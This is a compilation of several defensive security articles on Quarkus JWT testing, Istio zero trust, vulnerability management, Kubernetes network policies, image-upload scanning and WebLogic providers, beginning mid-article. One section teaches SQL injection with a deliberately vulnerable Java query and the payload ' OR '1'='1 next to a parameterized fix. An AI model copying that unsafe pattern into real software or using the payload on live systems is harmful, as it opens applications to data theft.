In a similar way to testing the built-in RBAC, the @TestSecurity annotation can be utilized to create a JWT for testing purposes. Additionally, the Quarkus library offers the @JwtSecurity annotation, which enables the addition of extra claims to the JWT, including the userId claim.

Java
@Test
@TestSecurity(user = "testUser", roles = "Admin")
@JwtSecurity(claims = {
        @Claim(key = "userId", value = "1234")
})
public void testTaskPostEndpoint() {
    given().log().all()
        .body("{id: task1}")
        .when().post("/task")
        .then()
        .statusCode(200)
        .body(is("Valid Task received"));
}

@Test
@TestSecurity(user = "testUser", roles = "Admin")
@JwtSecurity(claims = {
        @Claim(key = "userId", value = "6789")
})
public void testTaskPostMember() {
    given().log().all()
        .body("{id: task1}")
        .when().post("/task")
        .then()
        .statusCode(403);
}

Conclusion

As cyber-attacks continue to rise, protecting REST APIs is becoming increasingly crucial. A potential security breach can result in massive financial losses and reputational damage for a company. While Quarkus is a versatile Java framework that provides built-in RBAC support for securing REST APIs, its native support may be inadequate in certain scenarios, particularly for fine-grained access control. The above article covers both the implementation of the built-in RBAC support in Quarkus and the development and testing of a custom role-based access control solution in Quarkus.
Security was mostly perimeter-based while building monolithic applications. This meant securing the network perimeter and controlling access using firewalls. With the advent of microservices architecture, static and network-based perimeters are no longer effective. Nowadays, applications are deployed and managed by container orchestration systems like Kubernetes, which are spread across the cloud. Zero trust network (ZTN) is a different approach to securing data across cloud-based networks. In this article, we will explore how Istio, with a ZTN philosophy, can help secure microservices.

What Is Zero Trust Network (ZTN)?

"Zero trust network" is a security paradigm that does not grant implicit trust to users, devices, and services, and continuously verifies their identity and authorization to access resources. In a microservices architecture, if a service (server) receives a request from another service (client), the server should not assume the trustworthiness of the client. The server should continuously authenticate and authorize a client first and then allow the communication to happen securely (refer to fig. A below).

Fig. A: A Zero Trust Network (ZTN) environment where continuous authentication and authorization are enforced between microservices across multicloud.

Why Is a Zero Trust Network Environment Inevitable for Microservices?

The importance of securing the network and data in a distributed network of services cannot be stressed enough. Below are a few challenges that point to why a ZTN environment is necessary for microservices:
Lack of ownership of the network: Applications moved from perimeter-based deployments to multiple clouds and data centers with microservices. As a result, the network has also become distributed, giving intruders a larger attack surface.
Increased network and security breaches: Data and security breaches among cloud providers are increasingly common since applications moved to public clouds. In 2022, nearly half of all data breaches occurred in the cloud.
Managing multicluster network policies has become tedious: Organizations deploy hundreds of services across multiple Kubernetes clusters and environments. Network policies are local to clusters and do not usually work for multiple clusters. They need a lot of customization and development to define and implement security and routing policies for multicluster and multicloud traffic. Thus, configuring and managing consistent network policies and firewall rules for each service becomes an everlasting and frustrating process.
Service-to-service connection is not inherently secure in K8s: By default, one service can talk to another service inside a cluster. So, if a service pod is hacked, an attacker can quickly hack other services in that cluster (also known as a vector attack). Kubernetes does not provide out-of-the-box encryption or authentication for communication between pods or services. Although K8s offers additional security features like enabling mTLS, it is a complex process and has to be implemented manually for each service.
Lack of visibility into the network traffic: If there is a security breach, the Ops and SRE team should be able to react to the incident faster. Poor real-time visibility into the network traffic across environments becomes a bottleneck for SREs to diagnose issues in time. This impedes their ability to respond to incidents, which leads to high mean time to recovery (MTTR) and catastrophic security risks.

In theory, a zero trust network (ZTN) philosophy solves all the above challenges.
In practice, Istio service mesh can help Ops and SREs implement ZTN and secure microservices across the cloud.

How Istio Service Mesh Enables ZTN for Microservices

Istio is a popular open-source service mesh implementation that provides a way to manage and secure communication between microservices. Istio abstracts the network into a dedicated layer of infrastructure and provides visibility and control over all communication between microservices. Istio works by injecting an Envoy proxy (a small sidecar daemon) alongside each service in the mesh (refer to fig. B). Envoy is an L4 and L7 proxy that helps secure connections and provide network connectivity among the microservices. The Istio control plane allows users to manage all these Envoy proxies, such as directly defining and cascading security and network policies.

Fig B: Istio using Envoy proxy to secure connections between services across clusters and clouds.

Istio simplifies enforcing a ZTN environment for microservices across the cloud. Inspired by Gartner Zero Trust Network Access, I have outlined four pillars of zero trust network that can be implemented using Istio.

Four pillars of zero trust network enforced by Istio service mesh.

1. Enforcing Authentication With Istio

Security teams would otherwise be required to create authentication logic for each service to verify the identity of users (humans or machines) that sent requests. The process is necessary to ensure the trustworthiness of the user. In Istio, it can be done by configuring peer-to-peer and request authentication policies using the PeerAuthentication and RequestAuthentication custom resource definitions (CRDs).

Peer authentication policies involve authenticating service-to-service communication using mTLS. That is, certificates are issued for both the client and server to verify the identity of each other. Below is a sample PeerAuthentication resource that enforces strict mTLS authentication for all workloads in the foo namespace:

YAML
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: default
  namespace: foo
spec:
  mtls:
    mode: STRICT

Request authentication policies involve the server ensuring whether the client is even allowed to make the request. Here, the client will attach a JWT (JSON Web Token) to the request for server-side authentication. Below is a sample RequestAuthentication policy created in the foo namespace. It specifies that incoming requests to the my-app service must contain a JWT issued by the issuer listed under jwtRules and verified using its public keys.

YAML
apiVersion: security.istio.io/v1beta1
kind: RequestAuthentication
metadata:
  name: jwt-example
  namespace: foo
spec:
  selector:
    matchLabels:
      app: my-app
  jwtRules:
  - issuer: "https://issuer.example.com"
    jwksUri: "https://issuer.example.com/keys"

Both authentication policies are stored in Istio configuration storage.

2. Implementing Authorization With Istio

Authorization is verifying whether the authenticated user is allowed to access a server (access control) and perform the specific action. Continuous authorization prevents malicious users from accessing services, which ensures their safety and integrity. AuthorizationPolicy is another Istio CRD that provides access control for services deployed in the mesh. It helps in creating policies to deny, allow, and also perform custom actions against an inbound request. Istio allows setting multiple policies with different actions for granular access control to the workloads.
The following AuthorizationPolicy denies POST requests from workloads in the dev namespace to workloads in the foo namespace.

YAML
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: httpbin
  namespace: foo
spec:
  action: DENY
  rules:
  - from:
    - source:
        namespaces: ["dev"]
    to:
    - operation:
        methods: ["POST"]

3. Multicluster and Multicloud Visibility With Istio

Another important pillar of ZTN is network and service visibility. SREs and Ops teams require real-time monitoring of traffic flowing between microservices across cloud and cluster boundaries. Having deep visibility into the network helps SREs quickly identify the root cause of anomalies, develop a resolution, and restore the applications. Istio provides visibility into traffic flow and application health by collecting the following telemetry data from the mesh's data and control planes.
Logs: Istio collects all kinds of logs, such as service logs, API logs, access logs, gateway logs, etc., which help to understand the behavior of an application. Logs also help in faster troubleshooting and diagnosis of network incidents.
Metrics: They help to understand the real-time performance of services for identifying anomalies and fine-tuning them at runtime. Istio provides many metrics in addition to the four golden signals: error rate, traffic, latency, and saturation.
Distributed tracing: This is the tracing and visualizing of requests flowing through multiple services in a mesh. Distributed tracing helps understand interactions between microservices and provides a holistic view of service-to-service communication in the mesh.

4. Network Auditing With Istio

Auditing is analyzing logs of a process over a period with the goal of optimizing the overall process. Audit logs provide auditors with valuable insights into network activity, including details on each access, the methods used, traffic patterns, etc. This information is useful to understand the communication process in and out of the data center and public clouds. Istio provides information about who accessed (or requested) what resources and when, which is important for auditors to investigate faulty situations (a sketch of enabling mesh-wide access logging follows at the end of this article). The information is required for the auditors to suggest steps to improve the overall performance of the network and the security of cloud-native applications.

Deploy Istio for a Better Security Posture

The challenges around securing networks and data in a microservices architecture are going to be increasingly complex. Attackers are always ahead in finding vulnerabilities and exploiting them before anyone in the SRE team gets time to notice. Implementing a zero trust network will provide visibility and secure Kubernetes clusters from internal or external threats. Istio service mesh can lead this endeavor from the front, with its ability to implement zero trust out of the box.
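As referenced in the auditing section above, one way to turn on mesh-wide Envoy access logging for audit purposes is Istio's Telemetry API. The sketch below assumes a recent Istio release where this API is available and uses the built-in Envoy access log provider:

YAML
apiVersion: telemetry.istio.io/v1alpha1
kind: Telemetry
metadata:
  name: mesh-default
  namespace: istio-system   # created in the root namespace so it applies mesh-wide
spec:
  accessLogging:
  - providers:
    - name: envoy            # emit Envoy access logs for every workload in the mesh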
Vulnerability management is a proactive approach to identifying, managing, and mitigating network vulnerabilities to improve the security of an enterprise's applications, software, and devices. It includes identifying vulnerabilities in IT assets, assessing risks, and taking appropriate action on systems and networks. Organizations worldwide invest in vulnerability management to protect systems and networks against security breaches and data theft. Often combined with risk management and other security measures, vulnerability management has become an integral part of today's computer and network security practices to prevent the exploitation of IT vulnerabilities, such as code and design flaws, to compromise the security of the entire enterprise network.

The Importance of Vulnerability Management

Despite the effectiveness of vulnerability management for many cybersecurity risks, organizations often overlook the implementation of robust vulnerability management processes, as evidenced by the sheer number of data breaches, and are, therefore, unknowingly exposed by missing patches and misconfigurations. Vulnerability management is designed to investigate an organization's security posture and detect such vulnerabilities before a malicious hacker discovers them. This is why implementing a vulnerability management program is essential for companies of all sizes. Powerful vulnerability management leverages threat intelligence and IT team knowledge to rank risks and respond quickly to security vulnerabilities.

Four Stages of Vulnerability Management

Several steps must be considered when creating a vulnerability management program. Incorporating these steps into the management process can help prevent vulnerabilities from being overlooked. It can also correctly address any vulnerabilities found.

Identify Vulnerabilities

Vulnerability scanners are at the core of a standard vulnerability management solution. The scan consists of four stages:
Scan systems that have access to the network by sending Ping or TCP/UDP packets.
Identify open ports and services running on the scanned system.
Log in to the system remotely and gather detailed system information.
Associate the gathered system information with known vulnerabilities.

Vulnerability scanners can identify various systems running on a network, including laptops, desktops, virtual and physical servers, databases, firewalls, switches, and printers. The recognized systems are investigated for various attributes, such as operating system, open ports, installed software, user accounts, file system structure, and system configuration. This information is used to associate known vulnerabilities with the scanned system. To make this association, the vulnerability scanner uses a vulnerability database that contains a list of commonly known vulnerabilities.

Evaluation

Once scans have discovered all the potential known cybersecurity vulnerabilities, it's time to evaluate and prioritize them. The scan may have found thousands of possible weaknesses, some of which pose a greater risk than others. To sort them out, vulnerability assessments must be conducted to evaluate or score all vulnerabilities in terms of the threat to the company if they are exploited. Many systems can be used for prioritization, but the Common Vulnerability Scoring System (CVSS) is one of the most referenced. For example, under CVSS v3, scores from 9.0 to 10.0 are rated critical and typically move to the top of the remediation queue. It's essential to repeat this prioritization process every time you run a scan and discover new vulnerabilities to find those that are most critical to IT security.
Vulnerability Remediation If the vulnerability is verified and identified as a risk, the next step is to decide, together with the primary stakeholders of the business and network, how it should be handled. The vulnerability can be addressed in the following ways: Rectification: Either completely fix the vulnerability or apply a patch to prevent it from being exploited. This is the ideal outcome the organization is aiming for. Mitigation: Reduce the likelihood and impact of a vulnerability being exploited. Mitigation may be necessary if appropriate fixes or patches are not available for the identified vulnerabilities, and it is ideally used to buy time until the organization can fix the vulnerability for good. Vulnerability management solutions recommend remediation techniques for vulnerabilities. However, there may be better ways to address an exposure than the recommended repair method. Reporting and Follow-Up Once you have addressed the published vulnerabilities, it's time to take advantage of the reporting tools in your vulnerability management solution. Reporting gives the security team an overview of the effort required by each remediation technique and allows them to determine the most efficient way to address vulnerability issues in the future. Actions to take at this point include: Setting up patching tools. Scheduling automatic updates. Coordinating with your cyber-IT security staff. Setting up a ticketing system in case of a security issue. These reports can also be used to demonstrate compliance with any regulatory agency in the industry by showing the level of breach risk and the actions taken to reduce that risk. Cybercriminals are constantly evolving, so vulnerability management assessments must be conducted regularly to reduce the number of vulnerabilities and keep network security up to date. Ways to Integrate Security 1. Application security scan to secure CI/CD pipeline Continuous Integration and Continuous Delivery (CI/CD) pipelines are the foundation of every modern software organization. Combined with DevOps practices, the CI/CD pipeline allows your company to deliver software faster and more often. However, great power carries great responsibility. While everyone concentrates on writing secure applications, many people overlook the security of the CI/CD pipeline itself, yet there are legitimate reasons to pay close attention to the configuration of CI/CD. 2. Importance of CI/CD security CI/CD pipelines usually require a lot of permissions to do their job, and they also handle application and infrastructure secrets. Anyone with unauthorized access to the CI/CD pipeline has almost unlimited power to compromise all infrastructure or deploy malicious code. Therefore, securing the CI/CD pipeline should be a high-priority task. Unfortunately, statistics show that there has been a significant increase in attacks on the software supply chain in recent years. 3. Static Application Security Testing (SAST) Static Application Security Testing (SAST) complements SCA by assessing potential vulnerabilities in your source code. In other words, SCA relies on a database of known vulnerabilities to identify issues in third-party code, while SAST analyzes your custom code to detect potential security issues such as improper input validation.
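To make "improper input validation" concrete, the minimal sketch below shows the classic SQL injection flaw that SAST looks for in source code and that DAST later confirms by sending malicious inputs to the running application. The users table and column names are hypothetical:
Java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.Statement;

public class LoginDao {

    // Vulnerable pattern: user input is concatenated into the query, so an input such as
    // ' OR '1'='1 changes the meaning of the SQL statement.
    ResultSet findUserUnsafe(Connection conn, String username) throws Exception {
        Statement stmt = conn.createStatement();
        return stmt.executeQuery("SELECT * FROM users WHERE name = '" + username + "'");
    }

    // Safer pattern: a parameterized query keeps the input as data rather than executable SQL.
    ResultSet findUserSafe(Connection conn, String username) throws Exception {
        PreparedStatement stmt = conn.prepareStatement("SELECT * FROM users WHERE name = ?");
        stmt.setString(1, username);
        return stmt.executeQuery();
    }
}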
In this way, by running SAST at the beginning of the CI/CD pipeline in addition to SCA, you gain a second layer of protection against the risks inherent in your source code. 4. Vulnerability scanning Vulnerability scanning is an automated process that proactively identifies network, application, and security vulnerabilities. Vulnerability scans are typically performed by an organization's IT department or a third-party security service provider. Unfortunately, the same kind of scan is also used by attackers looking for entry points into the network. Scanning involves detecting and classifying system weaknesses in networks, communications equipment, and computers. Vulnerability scanning identifies security holes and helps predict how effective countermeasures will be in the event of a threat or attack. A vulnerability scanner operates from the attacker's point of view, probing the attack surface of the target being assessed. The scanner compares what it finds against a database that references known defects, coding bugs, anomalies in packet construction, default settings, and paths to sensitive data that an attacker may exploit. 5. Software composition analysis (SCA) Software composition analysis (SCA) is the process of automatically visualizing the use of open-source software (OSS) for risk management, security, and license compliance purposes. Open-source software is used across all industries, and the need to track components to protect companies from problems and open-source vulnerabilities is growing exponentially. However, since most software production involves OSS, manual tracking is impractical; automation is required to scan source code, binaries, and dependencies. SCA tools are becoming an integral part of application security, enabling organizations to use code scanning to discover evidence of OSS, to reduce the cost of fixing vulnerabilities and licensing issues by catching them early, and to use automated scanning to find and fix problems with less effort. In addition, SCA continuously monitors security and vulnerability issues to manage workloads better and increase productivity, enabling users to create actionable alerts for new vulnerabilities in current and shipping products. 6. Dynamic Application Security Testing (DAST) A DAST solution identifies potential input fields in your application and sends them various abnormal and malicious inputs. These can include attempts to exploit common vulnerabilities, such as SQL injection commands, cross-site scripting (XSS) payloads, long input strings, and abnormal input that could reveal input validation and memory management issues within the application. The DAST tool identifies whether an application contains a specific vulnerability based on the application's response to various inputs. For example, if a SQL injection attack attempts to gain unauthorized access to data, or an application crashes due to invalid or unauthorized input, this indicates an exploitable vulnerability. 7. Container Security The process of securing containers is continuous. It must be integrated into the development process, automated to reduce manual touchpoints, and extended to maintaining and operating the underlying infrastructure. It means protecting the build pipeline's container image as well as the runtime host, platform, and application layers (a minimal runtime-hardening sketch follows below).
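As referenced above, here is a minimal, hedged sketch of runtime hardening for a container workload. The pod name and image are placeholders, and the settings shown are a common starting point rather than a complete container security policy:
YAML
apiVersion: v1
kind: Pod
metadata:
  name: hardened-app                        # placeholder name
spec:
  securityContext:
    runAsNonRoot: true                      # refuse to start containers that run as root
  containers:
    - name: app
      image: registry.example.com/app:1.0   # placeholder image
      securityContext:
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
        capabilities:
          drop: ["ALL"]                     # drop all Linux capabilities unless explicitly required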
Implementing security as part of the continuous delivery lifecycle reduces risk and exposure to the growing number of attacks on your business. Containers have security benefits, such as strong application isolation, but they also expand your organization's threat surface. The significant increase in container deployments in production environments makes them attractive targets for malicious actors. In addition, a single container that is vulnerable or compromised can become an entry point into the organization's entire environment. 8. Infrastructure Security Vulnerability scanning is a complex topic, and organizations evaluating vulnerability scanning solutions are often unsure exactly what it covers. Infrastructure vulnerability scanning is the process of running a series of automated checks against a target or range of targets in the infrastructure to detect potentially exploitable security vulnerabilities. A target is specified as a fully qualified domain name (FQDN) that resolves to one or more IP addresses, as an IP address range, or as individual IP addresses to be scanned. An infrastructure vulnerability scan is performed across a network, such as the internet. The scan runs on, and originates from, a dedicated scan hub, which runs a scan engine that connects to the scanned target to evaluate its vulnerabilities. Conclusion Vulnerability management is a proactive approach to identifying, managing, and mitigating network vulnerabilities to improve the security of an enterprise's applications, software, and devices hosted in the cloud. It includes identifying vulnerabilities in IT assets, assessing risks, and taking appropriate action on systems and networks. Implementing a vulnerability management program is essential for companies of all sizes, as it leverages threat intelligence and IT team knowledge to rank risks and respond quickly to security vulnerabilities. The vulnerability management program consists of four stages: identifying vulnerabilities, evaluating them, remediating them, and reporting and follow-up. Integrating security measures, such as securing CI/CD pipelines, using vulnerability scanning tools, and implementing SCA, SAST, DAST, etc., can complement the vulnerability management program to provide a robust security approach.
As more applications are deployed in Kubernetes clusters, ensuring that traffic flows securely and efficiently between them becomes increasingly important. Kubernetes Network Policies are a powerful tool for controlling traffic flow at the IP address or port level, but implementing them effectively requires following best practices. In this article, we will explore ten best practices for using Kubernetes Network Policies to enhance the security and reliability of your applications. 1. Use Namespaces and Labels for Granular Policy Enforcement YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: backend-policy namespace: backend spec: podSelector: matchLabels: app: backend ingress: - from: - podSelector: matchLabels: app: frontend In this example, we’re applying a Network Policy to the backend namespace, restricting traffic to pods with the label app: backend. We also allow traffic from pods with the label app: frontend. 2. Use Default-Deny Policies to Enforce a Secure Environment YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: default-deny spec: podSelector: {} policyTypes: - Ingress - Egress By default, Kubernetes allows all network traffic between pods. Using a default-deny policy can help you create a more secure environment by blocking all traffic unless it is explicitly allowed by a policy. In this example, we’re creating a Network Policy that denies all ingress and egress traffic by default. 3. Use IP Blocks to Restrict Traffic to Specific IP Addresses or Ranges YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: restrict-external-access spec: podSelector: matchLabels: app: backend egress: - to: - ipBlock: cidr: 192.168.0.0/16 In this example, we’re creating a Network Policy that restricts egress traffic from pods with the label app: backend to the IP range 192.168.0.0/16. 4. Use Port-Based Policies to Control Traffic to Specific Ports YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: restrict-http-access spec: podSelector: matchLabels: app: backend ingress: - from: - podSelector: matchLabels: app: frontend ports: - protocol: TCP port: 80 In this example, we’re creating a Network Policy that allows ingress traffic from pods with the label app: frontend to the pods with the label app: backend on port 80. 5. Use Labels to Apply Multiple Policies to the Same Pods YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: policy1 spec: podSelector: matchLabels: app: backend ingress: - from: - podSelector: matchLabels: app: frontend ports: - protocol: TCP port: 80 --- apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: policy2 spec: podSelector: matchLabels: app: backend ingress: - from: - podSelector: matchLabels: app: frontend ports: - protocol: TCP port: 443 In this example, we’re creating two Network Policies that allow ingress traffic from pods with the label app: frontend to pods with the label app: backend. One policy allows traffic on port 80, while the other allows traffic on port 443. 6. Use Namespaces to Create Isolation Boundaries YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: isolate-frontend namespace: frontend spec: podSelector: {} policyTypes: - Ingress ingress: - from: - namespaceSelector: matchLabels: name: backend In this example, we’re creating a Network Policy in the frontend namespace that restricts ingress traffic to its pods, allowing only traffic from namespaces labeled name: backend. 7.
Use Network Policies to Enforce Compliance Requirements YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: restrict-sensitive-data-access spec: podSelector: matchLabels: app: sensitive-data ingress: - from: - podSelector: matchLabels: app: trusted-app ports: - protocol: TCP port: 443 In this example, we’re creating a Network Policy that only allows ingress traffic from pods with the label app: trusted-app to the pods with the label app: sensitive-data on port 443. 8. Use Network Policies to Improve Application Security YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: restrict-access spec: podSelector: matchLabels: app: backend ingress: - from: - ipBlock: cidr: 10.10.0.0/24 ports: - protocol: TCP port: 80 In this example, we’re creating a Network Policy that only allows ingress traffic from IP addresses within the 10.10.0.0/24 CIDR block to the pods with the label app: backend on port 80. 9. Understand and Document the Traffic Flow Before creating network policies, it is essential to understand and document how traffic flows within your cluster. This will help you identify which pods need to communicate with each other and which pods should be isolated. 10. Document Your Policies Document your network policies, including their purpose, rules, and expected behavior. This will help you and other developers understand how traffic flows within your cluster. Conclusion In conclusion, Kubernetes Network Policies provide a powerful means of controlling traffic flow at the IP address or port level in your Kubernetes cluster. By following the best practices outlined in this article, you can ensure that your policies are effective and reliable and enhance the security of your applications. Remember to regularly review and update your policies as your environment changes to ensure that they remain effective. By doing so, you can help to safeguard your applications and data and provide a more secure and efficient experience for your users. With these best practices in mind, you can confidently deploy and manage your applications in Kubernetes with the added peace of mind that comes from knowing your network traffic is secured.
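One practical footnote to the default-deny practice shown earlier: a policy that denies all egress also blocks DNS, so pods can no longer resolve service names. A hedged companion sketch that re-allows DNS egress might look like the following; the kube-dns pod label and the kube-system namespace label match common cluster defaults but should be verified in your environment:
YAML
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-egress
spec:
  podSelector: {}                  # applies to all pods in the namespace
  policyTypes:
    - Egress
  egress:
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
          podSelector:
            matchLabels:
              k8s-app: kube-dns
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53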
Direct image upload processes create a highly efficient path between client-side users and a website’s underlying file storage instances, significantly benefiting both ends of the client/web service relationship. Due largely to the ever-increasing availability (and affordability) of cloud storage resources for independent developer projects and small business ventures, we see the option to upload our own image files more and more frequently everywhere we look online, growing in tandem with steady demand for new forms of social engagement and commerce. The trouble is, however, that file upload security is a very serious issue - and image files are rather easily exploited by client-side threat actors. Image files aren’t unique in this respect, of course (many common file formats including PDF, DOCX, etc., for example, can house a variety of hidden threats), but their monumental value on the internet – a mostly visual platform – sets them apart as one of the more expedient vessels for malicious content. Attackers can easily inject malware and other malicious code directly into image files using honed steganographic techniques, reliably avoiding detection from poorly configured upload security policies. Malware can be hidden in several different ways within an image file – bluntly appended to the end of a file, subtly incorporated through minor code changes, or even concealed in the image’s metadata or EXIF data. Malicious code is generally designed to execute remotely or upon file opening, meaning dormant, undetected threats in storage can wait days, weeks, or even months before suddenly unleashing dangerous content. It isn’t just the website’s system they can exploit, too: if an unsuspecting client-side user downloads an infected file, their device can be quickly compromised, badly (perhaps permanently) damaging the website’s reputation. Mitigating image file upload threats starts with implementing powerful virus and malware detection policies, and it also involves putting sensible file upload validation measures in place. Unusually large image files, for example, might indicate a hidden threat, so understanding (and possibly standardizing) the size of image uploads can help facilitate quicker threat detection. Moreover, limiting the number of different file extensions allowed for upload (for example, limiting to PNG or JPG) makes file extension validation easier and more efficient to carry out. File extensions and headers shouldn’t be trusted blindly, either – thorough content verification should always take the file structure and file encoding into consideration. Demonstration In the remainder of this article, I’ll demonstrate two simple, free-to-use solutions which can help virus scan and validate image file uploads prior to reaching cloud storage. Both can be taken advantage of efficiently using complementary, ready-to-run Java code examples to structure your API calls. These APIs perform the following functions respectively: Scan image files for viruses Validate image files Used in conjunction with one another, both APIs can help ensure image uploads are valid and free of viruses and malware, significantly mitigating the risks associated with direct image file uploads. Scan an Image File for Viruses This API is equipped with more than 17 million virus and malware signatures, covering extremely common threats like trojans, ransomware, and spyware among others. 
It isn’t limited to image files either (you can also scan documents like PDF, DOCX, XLSX, etc.), so it offers some versatility if your file upload process accepts multiple file types. All scanned files will ultimately receive a "CleanResult: True" or "CleanResult: False" Boolean response; if false, the name of the detected virus will be provided in the API response. To install the client SDK, first, add a reference to the repository in your Maven POM File. Jitpack is used to dynamically compile the library: XML <repositories> <repository> <id>jitpack.io</id> <url>https://jitpack.io</url> </repository> </repositories> After that, add a reference to the dependency: XML <dependencies> <dependency> <groupId>com.github.Cloudmersive</groupId> <artifactId>Cloudmersive.APIClient.Java</artifactId> <version>v4.25</version> </dependency> </dependencies> With installation out of the way, you can structure your API call using the following complementary code examples: Java // Import classes: //import com.cloudmersive.client.invoker.ApiClient; //import com.cloudmersive.client.invoker.ApiException; //import com.cloudmersive.client.invoker.Configuration; //import com.cloudmersive.client.invoker.auth.*; //import com.cloudmersive.client.ScanApi; ApiClient defaultClient = Configuration.getDefaultApiClient(); // Configure API key authorization: Apikey ApiKeyAuth Apikey = (ApiKeyAuth) defaultClient.getAuthentication("Apikey"); Apikey.setApiKey("YOUR API KEY"); // Uncomment the following line to set a prefix for the API key, e.g. "Token" (defaults to null) //Apikey.setApiKeyPrefix("Token"); ScanApi apiInstance = new ScanApi(); File inputFile = new File("/path/to/inputfile"); // File | Input file to perform the operation on. try { VirusScanResult result = apiInstance.scanFile(inputFile); System.out.println(result); } catch (ApiException e) { System.err.println("Exception when calling ScanApi#scanFile"); e.printStackTrace(); } When testing this solution, I’d recommend thoroughly researching options for inert files that can safely trigger a "CleanResult: False" response (Eicar files, for example, are often a popular choice in this regard). Validate an Image File This API is designed to rigorously validate dozens of common input image types, including JPG, PNG, WEBP, GIF, and many more. It’ll identify whether the content contained within an image upload matches its extension, whether the file is password protected, and if there are any errors and warnings present within the file. If any errors are detected, the API response will provide a description of the error, a path to the error, and a URI for reference. You can install this client SDK the same way as before. 
Add this reference to your Maven POM file repository: XML <repositories> <repository> <id>jitpack.io</id> <url>https://jitpack.io</url> </repository> </repositories> Then add a reference to the dependency: XML <dependencies> <dependency> <groupId>com.github.Cloudmersive</groupId> <artifactId>Cloudmersive.APIClient.Java</artifactId> <version>v4.25</version> </dependency> </dependencies> Finally, you can structure your API call using the ready-to-run code examples below: Java // Import classes: //import com.cloudmersive.client.invoker.ApiClient; //import com.cloudmersive.client.invoker.ApiException; //import com.cloudmersive.client.invoker.Configuration; //import com.cloudmersive.client.invoker.auth.*; //import com.cloudmersive.client.ValidateDocumentApi; ApiClient defaultClient = Configuration.getDefaultApiClient(); // Configure API key authorization: Apikey ApiKeyAuth Apikey = (ApiKeyAuth) defaultClient.getAuthentication("Apikey"); Apikey.setApiKey("YOUR API KEY"); // Uncomment the following line to set a prefix for the API key, e.g. "Token" (defaults to null) //Apikey.setApiKeyPrefix("Token"); ValidateDocumentApi apiInstance = new ValidateDocumentApi(); File inputFile = new File("/path/to/inputfile"); // File | Input file to perform the operation on. try { DocumentValidationResult result = apiInstance.validateDocumentImageValidation(inputFile); System.out.println(result); } catch (ApiException e) { System.err.println("Exception when calling ValidateDocumentApi#validateDocumentImageValidation"); e.printStackTrace(); }
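Used together, the two calls can gate an upload before it ever reaches storage. The hedged sketch below assumes the SDK's result objects expose getCleanResult() and getDocumentIsValid() accessors and that the model classes live under com.cloudmersive.client.model (verify both against the client library version you install); it also assumes the ApiClient has already been configured with your API key as shown in the earlier snippets, and storeInCloud is a hypothetical persistence method supplied by your own application:
Java
import java.io.File;

import com.cloudmersive.client.ScanApi;
import com.cloudmersive.client.ValidateDocumentApi;
import com.cloudmersive.client.model.DocumentValidationResult;
import com.cloudmersive.client.model.VirusScanResult;

public class ImageUploadGate {

    private final ScanApi scanApi = new ScanApi();
    private final ValidateDocumentApi validateApi = new ValidateDocumentApi();

    public boolean acceptUpload(File upload) throws Exception {
        // 1. Reject anything that matches a known virus or malware signature.
        VirusScanResult scan = scanApi.scanFile(upload);
        if (scan.getCleanResult() == null || !scan.getCleanResult()) {
            return false;
        }

        // 2. Reject files whose content does not hold up as a valid image.
        DocumentValidationResult validation = validateApi.validateDocumentImageValidation(upload);
        if (validation.getDocumentIsValid() == null || !validation.getDocumentIsValid()) {
            return false;
        }

        storeInCloud(upload); // hypothetical persistence step
        return true;
    }

    private void storeInCloud(File upload) {
        // placeholder: push the vetted file to your storage bucket here
    }
}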
WebLogic Server is a Java-based application server that provides a platform for deploying and managing distributed applications and services. It is a part of the Oracle Fusion Middleware family of products and is designed to support large-scale, mission-critical applications. WebLogic Server provides a Security Framework that includes a default Security Provider, which provides authentication, authorization, and auditing services to protect resources such as applications, EJBs, and web services. However, you can also use security plug-ins or custom security providers to extend the security framework to meet your specific security requirements. Here is a brief explanation of the security plug-ins and custom security providers in WebLogic Server: Security Plug-in: A security plug-in is a WebLogic Server component that provides authentication and authorization services for external security providers. It allows you to integrate third-party security products with WebLogic Server. The security plug-in communicates with the external security provider using the Simple and Protected GSSAPI Negotiation Mechanism (SPNEGO) protocol. You can configure the security plug-in using the WebLogic Server Administration Console or the command-line interface. Custom Security Providers: WebLogic Server provides several security providers such as the default security provider, LDAP security provider, and RDBMS security provider. However, if these security providers do not meet your security requirements, you can develop custom security providers. Custom security providers allow you to extend the security framework to meet your specific security needs. You can develop custom security providers using the WebLogic Server API or the Security Provider APIs. The development of custom security providers requires expertise in Java programming, and it is recommended that you test the custom security providers thoroughly before deploying them to a production environment. Security plug-ins and custom security providers allow you to extend the WebLogic Server Security Framework to meet your specific security requirements. You can use the WebLogic Server Administration Console or the command-line interface to configure security plug-ins and develop custom security providers. WebLogic Server provides several features to protect your resources, such as applications, EJBs, and web services, from unauthorized access, including authentication, authorization, SSL/TLS, network access control, firewalls, and Secure Sockets Layer acceleration. WebLogic Server provides a security framework that allows you to protect your resources, such as applications, EJBs, and web services. You can configure the security plug-in or custom security providers for resource protection in WebLogic Server by following these steps: Determine the security requirements: Before configuring the security plug-in or custom security providers, you need to determine the security requirements for your application. This includes identifying the authentication and authorization requirements. Configure the security realm: The security realm is the foundation of the WebLogic Server security framework. You need to configure the security realm with the necessary users, groups, and roles. You can use the WebLogic Administration Console or the WLST scripting tool to configure the security realm.
